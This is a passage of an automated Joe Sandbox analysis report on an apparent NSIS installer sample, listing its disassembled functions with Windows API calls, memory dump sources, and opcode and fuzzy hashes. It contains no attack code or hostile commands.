                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4215836453-2766056989
                                                                                                                                                                                                              • Opcode ID: 574abbdadf194fab47be470e7fbaa0850e4f7391dff1c4efc7d36e0ba334349f
                                                                                                                                                                                                              • Instruction ID: e7e9fe02224fa80e8acc3d91e69a95aa357927643f4877ada07b0f7c2baa17a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 574abbdadf194fab47be470e7fbaa0850e4f7391dff1c4efc7d36e0ba334349f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01112B75E142049BDB10EFB9DA89A8DBBB0AB48304F24453AE555F72D2DBB888419F18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F61 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004266D0,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,0040345A,0040A230,0040A230,0040335E,004266D0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 2738559852-1897978588
                                                                                                                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00423D35,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,004033DE,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,00423D35,004266D0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 3934441357-1897978588
                                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004C9000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                                              • Opcode ID: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction ID: 7d59cd0ba42eeb9d64297a1bfc0940e3ae1e5cc226c4bbb5031ea1960038836b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811D031904510EBCF30AFA5CD4599E36A0EF15329B28493BFA45B22F1DB3E8D819A5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(0045A730,0045A730,0045A730,0045A730,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00405E2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                              • Opcode ID: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction ID: 388cf340d0c034ef08ff27084220079457182ac4682ba574f5a4b5e3d5e6accd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0F43A005E1116D62233364D09BEF0948CE82314B1A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction ID: b0acf179c18152fd5568b60ba426e70b62ff0895eecaeb6bac654bfa50895d4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD012832620210DFE7195B789D18B2A3798E710718F10467FF955F62F1EA78CC429B4D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405EB9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004039E6 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 004039F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
